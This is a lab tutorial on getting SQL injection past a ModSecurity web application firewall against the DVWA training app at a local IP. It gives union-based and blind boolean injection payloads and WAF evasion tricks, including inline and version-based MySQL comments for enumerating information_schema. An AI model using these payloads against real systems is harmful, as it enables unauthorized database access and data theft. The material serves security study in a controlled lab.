- Bypassing MOD_SECURITY
- ======================
- Bypassing WAF Validations and Filterations
- ------------------------------------------
- Step 1: Attacking union-based injection on a website behind the WAF (note: open the IP address of the WAF host).
- http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1
- Step 2: Produce an error(By adding an extra single quote)
- http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1'
- Step 3: Let's find the total number of columns returned by the query behind this URL.
- http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' order by 1--+
- http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' order by 2--+
- http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' order by 3--+
- or, in the input field: 1' order by 1#, 1' order by 2#, 1' order by 3#
- Step 4: Once you know the number of columns, use a UNION SELECT statement to find out which columns are reflected in the page.
- http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' union select 1,2--+
- or
- for the input field 1' union select 1,2#
- As you can see, the request is blocked by the firewall. Let's understand why.
- The request contained the keyword UNION, which legitimate user input should never need to send to the database. When the web server receives the request it is handed to the WAF, which compares it against a blacklist of malicious tokens; UNION is on that list, so the request is blocked.
- union ---> Web Server --> ModSecurity (blacklist of malicious keywords, including union) ---> X Blocked.
- Bypassing Technique 1
- Upper/Lower Case Change
- 1. Upper/lower case method
- union all select : UnIoN aLl SeLeCt
- In the input field add the following:
- 1' uNiOn sEleCt 1,2#
- The above statement is still blocked: the WAF normalises the case of the input before matching it against the blacklist, so changing case alone is not enough. What does get through is hiding the keywords inside inline comments:
- 1' /*!union*/ /*!select*/ 1,2#
- Inline comments : /*! */
- Technique number 2: Inline Executable Comments
- MySQL/MariaDB execute whatever is inside /*! ... */ as SQL, while a generic parser (and a keyword blacklist) treats it as a comment.
- 1' /*!union*/ /*!select*/ 1,2#
- Step 2: 1' /*!union*/ /*!select*/ 1,/*!table_name*/ from /*!information_schema.tables*/#
- Target table is users
- Technique number 3: Version-Based Inline Executable Comments
- ------------------------------------------------------------
- /*!50000UnIoN*/ /*!50000aLl*/ /*!50000SeLeCt*/ (the + signs in the URL form are just URL-encoded spaces)
- MySQL versions: the number after /*! is five digits, MMmmrr (major version, two-digit minor, two-digit release). The server executes the comment body only if its own version is at least that number, so /*!50000 ... */ runs on 5.0.0 and anything newer (including MariaDB 10.x), and is treated as a plain comment by anything older.
- 5.00.00 --> 50000
- 4.00.00 --> 40000
- 3.00.00 --> 30000
- 2.00.00 --> 20000
- 1.00.00 --> 10000
- Step 3:
- 1' /*!50000union*/ /*!50000select*/ 1,/*!50000table_name*/ from /*!50000information_schema.tables*/#
- Blind SQL Injection
- -------------------
- Blind SQL injection is a type of SQL injection attack that asks the database true-or-false questions and determines the answer from the application's response.
- This attack is often used when the web application is configured to show only a generic error message, but the code that is vulnerable to SQLi has not been fixed.
- This type of SQL injection is otherwise identical to normal SQL injection; the only difference is how the data is retrieved from the database (inferred one bit at a time rather than read directly from the page).
- 1. Blind Boolean
- 2. Time Based SQL Injection
- Demo
- -----
- As you can see, the outputs are:
- 1' and 1=0 # ---> False
- 1' and 1=1 # ---> True
- 1' and 1=0 order by 1 # --> No result ---> generic error
- 1' and 1=1 order by 1 # --> Result --> normal result
- 1' and 1=0 order by 2 # --> No result
- so we can execute our statements, e.g.
- Steps
- Step 1:
- 1' and 1=1 order by 1 # --> data
- 1' and 1=1 order by 2 # --> data
- 1' and 1=1 order by 3 # --> no data; at this point you realise only two columns are present
- Then you can go on to execute UNION SELECT statements.
- Step 2:
- 1' and 1=1 union select 1,2#
- Substring and Blind Boolean Injection
- -----------
- We know that the attacker can ask the database true/false questions and it will answer 0 or 1, so we use substr here. substr is an SQL function that returns part of a string; we extract one character and ask whether it equals our guess.
- version() gives the database version
- Here the version is 10.1.34-MariaDB
- substr(version(),1,1)=1#
- substr(string, start, length): start is the 1-based position to begin at, length is the number of characters to take from that position.
- So the above statement takes only the character at position 1 of the version string. Position 1 holds '1', so the comparison is true and the database returns 1 (it would return 0 if false).
- position 1 -> 1
- position 2 -> 0
- position 3 -> .
- position 4 -> 1
- position 5 -> .
- Step 3: 1' and 1=1 union select 1,substr(version(),1,1)=1#
- The answer is 1 because the above condition is true.
- Similarly we can also ask something like
- 1' and 1=1 union select 1,substr(version(),3,1)='.'#
- The above statement means: take the character at position 3 of the version string and check whether it equals '.'. The version is 10.1.34-MariaDB and position 3 holds a dot, so the condition is true and the database answers 1.
- Note that here the 0/1 is read from the reflected UNION column, which is only possible because the page shows query output. In a truly blind situation the condition goes into the WHERE clause instead, e.g. 1' and substr(version(),3,1)='.'#, and you read the answer from whether the page behaves like the 1=1 (true) or the 1=0 (false) case shown above, one character per request.
- Drive Link
- https://drive.google.com/file/d/19umEKD0TfKwTbPL16RaTlyz0dMskINDb/view?usp=sharing